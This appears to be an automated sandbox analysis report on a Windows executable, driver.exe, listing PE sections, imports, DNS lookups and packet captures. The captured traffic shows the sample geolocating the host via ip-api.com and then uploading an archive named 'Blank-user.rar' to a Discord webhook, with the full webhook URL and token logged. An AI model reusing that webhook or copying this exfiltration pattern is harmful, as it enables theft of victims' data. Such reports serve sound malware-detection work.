IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x970	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x44000	0x2238	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x858b35	0x2448
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x48000	0x764	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a080	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39f40	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x4a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29f70	0x2a000	b8c3814c5fb0b18492ad4ec2ffe0830a	False	0.5518740699404762	data	6.489205819736506	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12a28	0x12c00	d9e0e2f2f3cb9eab7e846be0393eb2b1	False	0.5243229166666666	data	5.750785621849544	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x53f8	0xe00	dba0caeecab624a0ccc0d577241601d1	False	0.134765625	data	1.8392217063172436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x44000	0x2238	0x2400	9cd1eac931545f28ab09329f8bfce843	False	0.4697265625	data	5.2645170849678795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x970	0xa00	61a676912f2ddb206cf5c232fb489a14	False	0.429296875	data	5.074445172457018	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x48000	0x764	0x800	816c68eeb419ee2c08656c31c06a0fff	False	0.5576171875	data	5.2809528666624175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x470a0	0x3c0	data			0.43854166666666666
RT_MANIFEST	0x47460	0x50d	XML 1.0 document, ASCII text			0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 11:00:40.145982027 CET	49841	80	192.168.2.5	208.95.112.1
Jan 10, 2025 11:00:40.150933981 CET	80	49841	208.95.112.1	192.168.2.5
Jan 10, 2025 11:00:40.151021957 CET	49841	80	192.168.2.5	208.95.112.1
Jan 10, 2025 11:00:40.151107073 CET	49841	80	192.168.2.5	208.95.112.1
Jan 10, 2025 11:00:40.155939102 CET	80	49841	208.95.112.1	192.168.2.5
Jan 10, 2025 11:00:40.656667948 CET	80	49841	208.95.112.1	192.168.2.5
Jan 10, 2025 11:00:40.706634998 CET	49841	80	192.168.2.5	208.95.112.1
Jan 10, 2025 11:00:40.836596012 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:40.836627960 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:40.837143898 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:40.887939930 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:40.887960911 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.344429970 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.344906092 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.344927073 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.345989943 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.346071005 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.347512960 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.347587109 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.347851992 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.347961903 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.347985983 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.348102093 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.348141909 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.348314047 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.348361015 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.348489046 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.348510027 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.348539114 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.348551989 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.348603010 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.348613977 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.348634005 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.348643064 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.348660946 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.348679066 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.348737955 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.348747015 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.348767042 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.348781109 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.348788023 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.348797083 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.348810911 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.348825932 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.348854065 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.348869085 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.348891020 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.348903894 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.348995924 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349004984 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.349028111 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349036932 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.349061966 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349076033 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.349090099 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349095106 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.349116087 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349123001 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.349139929 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349147081 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.349220991 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349245071 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349257946 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349275112 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349301100 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349309921 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349330902 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349344969 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349361897 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349412918 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349452972 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349466085 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.349484921 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358309031 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.358443975 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358455896 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.358475924 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358485937 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358494997 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:41.358508110 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358529091 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358546972 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358556986 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358577967 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358598948 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358611107 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358635902 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358637094 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358712912 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358730078 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358781099 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358805895 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.358817101 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:41.363642931 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:42.018018007 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:42.018223047 CET	443	49845	162.159.137.232	192.168.2.5
Jan 10, 2025 11:00:42.018287897 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:42.018800020 CET	49845	443	192.168.2.5	162.159.137.232
Jan 10, 2025 11:00:42.193511963 CET	49841	80	192.168.2.5	208.95.112.1
Jan 10, 2025 11:00:42.198638916 CET	80	49841	208.95.112.1	192.168.2.5
Jan 10, 2025 11:00:42.198751926 CET	49841	80	192.168.2.5	208.95.112.1
Jan 10, 2025 11:00:46.152231932 CET	51955	53	192.168.2.5	162.159.36.2
Jan 10, 2025 11:00:46.157244921 CET	53	51955	162.159.36.2	192.168.2.5
Jan 10, 2025 11:00:46.157331944 CET	51955	53	192.168.2.5	162.159.36.2
Jan 10, 2025 11:00:46.157382965 CET	51955	53	192.168.2.5	162.159.36.2
Jan 10, 2025 11:00:46.162164927 CET	53	51955	162.159.36.2	192.168.2.5
Jan 10, 2025 11:00:46.629285097 CET	53	51955	162.159.36.2	192.168.2.5
Jan 10, 2025 11:00:46.637238026 CET	51955	53	192.168.2.5	162.159.36.2
Jan 10, 2025 11:00:46.642335892 CET	53	51955	162.159.36.2	192.168.2.5
Jan 10, 2025 11:00:46.642426014 CET	51955	53	192.168.2.5	162.159.36.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 11:00:40.137897015 CET	63409	53	192.168.2.5	1.1.1.1
Jan 10, 2025 11:00:40.145204067 CET	53	63409	1.1.1.1	192.168.2.5
Jan 10, 2025 11:00:40.828942060 CET	54999	53	192.168.2.5	1.1.1.1
Jan 10, 2025 11:00:40.835854053 CET	53	54999	1.1.1.1	192.168.2.5
Jan 10, 2025 11:00:46.151562929 CET	53	62883	162.159.36.2	192.168.2.5
Jan 10, 2025 11:00:46.680692911 CET	53	57670	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 11:00:40.137897015 CET	192.168.2.5	1.1.1.1	0x553d	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:00:40.828942060 CET	192.168.2.5	1.1.1.1	0x9003	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 11:00:40.145204067 CET	1.1.1.1	192.168.2.5	0x553d	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:00:40.835854053 CET	1.1.1.1	192.168.2.5	0x9003	No error (0)	discord.com	162.159.137.232	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:00:40.835854053 CET	1.1.1.1	192.168.2.5	0x9003	No error (0)	discord.com	162.159.138.232	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:00:40.835854053 CET	1.1.1.1	192.168.2.5	0x9003	No error (0)	discord.com	162.159.128.233	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:00:40.835854053 CET	1.1.1.1	192.168.2.5	0x9003	No error (0)	discord.com	162.159.136.232	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:00:40.835854053 CET	1.1.1.1	192.168.2.5	0x9003	No error (0)	discord.com	162.159.135.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discord.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49841	208.95.112.1	80	6620	C:\Users\user\Desktop\driver.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 11:00:40.151107073 CET	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.3.0
Jan 10, 2025 11:00:40.656667948 CET	381	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:00:39 GMT Content-Type: application/json; charset=utf-8 Content-Length: 204 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49845	162.159.137.232	443	6620	C:\Users\user\Desktop\driver.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:00:41 UTC	302	OUT	POST /api/webhooks/1326920011201118251/xRN_dhCbCT8HeZRae0xJk1yw1sh06GaK4mq7ylVag5fFfCbHC0_LWfgjquGILOcXtJ2V HTTP/1.1 Host: discord.com Accept-Encoding: identity Content-Length: 726172 User-Agent: python-urllib3/2.3.0 Content-Type: multipart/form-data; boundary=de3ccc329bb54b36f6288e69cf93885a
2025-01-10 10:00:41 UTC	16384	OUT	Data Raw: 2d 2d 64 65 33 63 63 63 33 32 39 62 62 35 34 62 33 36 66 36 32 38 38 65 36 39 63 66 39 33 38 38 35 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 b3 06 95 0e 21 04 00 00 01 0f d9 07 49 28 91 2a 71 78 8e d8 64 3d 26 2c 50 ed a2 c4 a3 83 7b 11 f4 84 0e 83 d6 71 61 30 97 e1 9d 9a 9f 63 13 f9 be 63 34 10 c8 13 56 2f 37 41 b0 5b c4 a8 e0 e2 4d d2 be 6a f0 48 d6 af db ed a2 36 20 45 22 38 2f 9d 1a cf b0 43 d5 a5 8c f6 8b 94 86 b5 c9 Data Ascii: --de3ccc329bb54b36f6288e69cf93885aContent-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!!I(*qxd=&,P{qa0cc4V/7A[MjH6 E"8/C
2025-01-10 10:00:41 UTC	16384	OUT	Data Raw: 22 e7 aa f5 74 d4 16 61 d9 59 09 53 63 34 b0 a5 00 77 3e 9d d8 e7 a0 fb e4 0f 19 d4 85 60 e1 52 db dd 07 61 c9 42 ce 3a d7 b3 a2 52 ee 63 1c 1a 1e 1c 8b d0 22 6a 50 db 37 a3 03 72 a3 e2 36 d3 13 48 7f 94 2b 21 25 ea 99 54 29 2a 53 e2 d7 11 76 30 02 b2 a7 c3 df 0c 91 01 3b 88 f7 57 a6 71 06 38 3c 32 28 f6 f4 0e ee 4d 70 b5 90 bc 4e fe 83 92 eb ab 92 17 f6 b3 3e 76 63 32 6b 7a 34 86 17 5e 21 30 1b f8 44 1b 57 ff bd 26 04 e3 3d b1 bb 19 44 57 16 d8 8a 46 59 4e ea ce bf b4 3a 32 9d 30 2e e6 36 cb 23 d2 dc ba 39 15 a9 66 8b aa 22 2e 65 48 22 0f da 6b 21 d0 d1 a9 24 39 85 1f dc 71 b6 e2 11 65 73 be 7a 43 a4 91 6a eb 2f 31 4d 10 a2 2e ad 4e 4e 13 ee 3a 70 29 14 15 10 1e 1e 1d cb 8d 41 68 fd 7e 95 0e de a9 45 ba 8b 34 0c cd 3b 61 7f fb a7 01 c8 6e 32 3e a3 c4 6e Data Ascii: "taYSc4w>`RaB:Rc"jP7r6H+!%T)*Sv0;Wq8<2(MpN>vc2kz4^!0DW&=DWFYN:20.6#9f".eH"k!$9qeszCj/1M.NN:p)Ah~E4;an2>n
2025-01-10 10:00:41 UTC	16384	OUT	Data Raw: e3 4f 2f 1b 18 14 08 37 77 e0 1d 4f 3a a7 07 16 e2 ad 34 65 b3 ac 3b 21 f8 35 f9 98 6d 6b c0 76 34 f5 39 3a 5a 2d af 25 9c 78 64 24 61 15 10 ba 95 e2 5d b2 8d 3c 0a d7 79 16 4c 58 16 98 7e 62 b3 4c 3c 96 7e 52 11 c2 9b 55 d1 f1 2d c4 61 7c a6 c9 c2 45 2a 82 ed b0 15 76 4c 04 5d 4d cf b0 5a 52 21 fb ed 3d a3 99 8c 0d 5e 70 58 45 70 f8 b5 5b 3e fa a2 02 43 61 de 7c 7e f7 a3 f9 3d f8 ae ae c5 8c ce f3 bf 0a ee 1d 51 67 58 ed 0e 0a 86 04 14 1e 2b 7b b0 2f 39 40 51 5c d8 d6 c4 89 87 ed a3 cf f1 3b 75 ca 85 92 92 77 01 f7 4c 30 dc c4 48 22 34 08 6f 33 07 66 f6 2a 12 e8 94 81 65 e2 f0 43 0e 8f 7f e5 85 dd 5f dc d6 35 51 18 11 d8 f4 b4 3b d5 95 77 b1 5e ab 5c 3a 5b 61 6f 78 44 2f 50 a5 27 0c 9e e0 de be c6 14 50 41 c5 e9 38 17 3d ad ec 5b f8 17 1c 25 3d 2d 1a 15 Data Ascii: O/7wO:4e;!5mkv49:Z-%xd$a]<yLX~bL<~RU-a\|EvL]MZR!=^pXEp[>Ca\|~=QgX+{/9@Q\;uwL0H"4o3feC_5Q;w^\:[aoxD/P'PA8=[%=-
2025-01-10 10:00:41 UTC	16384	OUT	Data Raw: df 6d 1a ec d5 da ff 2e 63 1d dc 68 09 20 43 d2 80 90 a4 08 89 3d f5 fc 74 34 1b 04 58 46 7a 0f 92 56 fe ae 78 e8 19 7f d5 36 18 d0 31 ed 80 6c 21 1c 53 7f f9 b4 1a c8 8d bb de 8e fc b6 ba c7 fe 12 41 71 a9 8e f4 10 d8 a0 ca 24 a8 94 e9 43 4e 0e d4 73 33 6b 71 07 5f fc 8a 1d 6b 4a 18 3b 99 ad a5 f5 b6 84 06 3f 4d 79 fd 20 55 f6 25 6e fa a9 10 e3 f2 f2 4d dc 58 ae 99 45 e6 5d c2 9e 92 0f 5d 9c 89 70 dc e8 c7 93 bc 04 78 ed 92 11 86 c6 d6 02 81 bb 52 ef 94 c3 35 d5 f5 d7 3e 4c b4 fa 92 2f d7 f3 c0 57 03 24 14 75 e2 4e fd 0d 9f 2b 45 e4 37 d7 00 0d 08 f3 33 32 9a 8c 17 c8 65 0b 06 76 26 29 99 17 e3 85 3d 1f db 2f 5a de 81 89 65 2d 5d ff 2c 13 57 d4 05 bb eb 41 52 86 34 96 36 b7 84 44 9d a6 36 bb 72 ed 20 ef 9e b2 17 5e 13 3d 61 cc d0 be 1c af 80 06 b4 f6 31 Data Ascii: m.ch C=t4XFzVx61l!SAq$CNs3kq_kJ;?My U%nMXE]]pxR5>L/W$uN+E732ev&)=/Ze-],WAR46D6r ^=a1
2025-01-10 10:00:41 UTC	16384	OUT	Data Raw: d7 a4 9d 3a 04 1f f6 ab e0 8e 3f 18 c3 1d f9 19 87 17 8f 68 4d c1 0d 5e 66 42 fb 10 9e 72 12 7c 36 e1 a3 f5 cf 26 1d 48 a7 b6 30 73 cd e0 17 90 b1 90 be b8 f1 c2 01 ec 7f 41 3a a4 e0 f4 4e 8d e9 81 16 a3 14 bc 90 df ff 14 13 31 4a a3 ff da 39 87 ab f5 78 3e 03 1e f6 0d 4e 13 b2 3b 87 3c f2 f2 02 58 a0 77 ce 12 7a fb a2 f2 a3 45 8c d8 59 d8 f4 fa 02 65 3d 00 59 83 6e d7 1c 84 29 1e be 6f 4b 62 3a c8 4b 1c 30 76 b1 51 da c3 5c ba 25 ef 9f 77 bf ee d3 c1 7e 14 86 86 de ec e0 bf dd 5a 49 e1 ae b1 d4 70 b7 94 86 b9 8e 2f 38 89 49 23 d5 ea a3 6d d5 a1 28 e7 8a 6e f2 ff f5 33 ef c2 8f 5b 8d 60 36 20 67 06 ab a1 47 e4 bd 38 f2 ef 79 0a b2 9a fb 76 e8 d9 1d 07 31 fd af 2a a6 b9 9b 47 95 8d cd 81 95 63 6f 88 bc 98 dd 15 69 75 49 43 05 41 20 02 57 64 78 7a 4a 7c 41 Data Ascii: :?hM^fBr\|6&H0sA:N1J9x>N;<XwzEYe=Yn)oKb:K0vQ\%w~ZIp/8I#m(n3[`6 gG8yv1*GcoiuICA WdxzJ\|A
2025-01-10 10:00:41 UTC	16384	OUT	Data Raw: b3 8b 31 9f 03 ae 52 02 68 a2 10 0d 35 bb 52 8d ec 19 ee 63 6c 7d 59 f0 d5 41 ba 3a 0f da d6 e7 dd 5a d3 3a 64 8c dc 38 f5 a5 b0 1e cf c9 74 ff de df 6b cb 4a c9 09 0b d9 82 18 b8 97 58 9b de 3d c2 e0 cc c2 b7 be 28 78 e4 e5 ae 3c 96 2e de 27 06 1d 29 03 38 9c 58 76 6b 7a b7 c2 84 03 d0 78 d0 62 9b da 1d 35 40 d7 16 2c 11 8b fc c9 2d 7a 4a fc 68 4d e2 05 1f f1 ed 0b ee ca f9 79 fb 86 b4 e3 e4 9d b5 88 98 2d 47 0a fd 94 87 17 19 a4 c7 e9 9d f8 bd 07 ff d5 34 a2 e8 86 57 3e c6 9a 2b cd 02 51 1e 81 60 e3 2f d4 98 c9 4e 5b ca f1 04 5b 58 0a 90 45 65 c4 f0 58 4b e2 06 cd de 82 19 b6 63 b3 b8 17 d9 3e 59 5b 25 f7 e2 89 12 dd b3 e1 97 68 f8 ad 49 3e c6 a5 cf 0f e6 a1 d3 3f 86 1f 58 2e db e1 bf 26 e3 21 fe 54 ad 5e 87 8b b7 b6 4f 96 06 db f7 13 ea dd 7e b1 02 3d Data Ascii: 1Rh5Rcl}YA:Z:d8tkJX=(x<.')8Xvkzxb5@,-zJhMy-G4W>+Q`/N[[XEeXKc>Y[%hI>?X.&!T^O~=
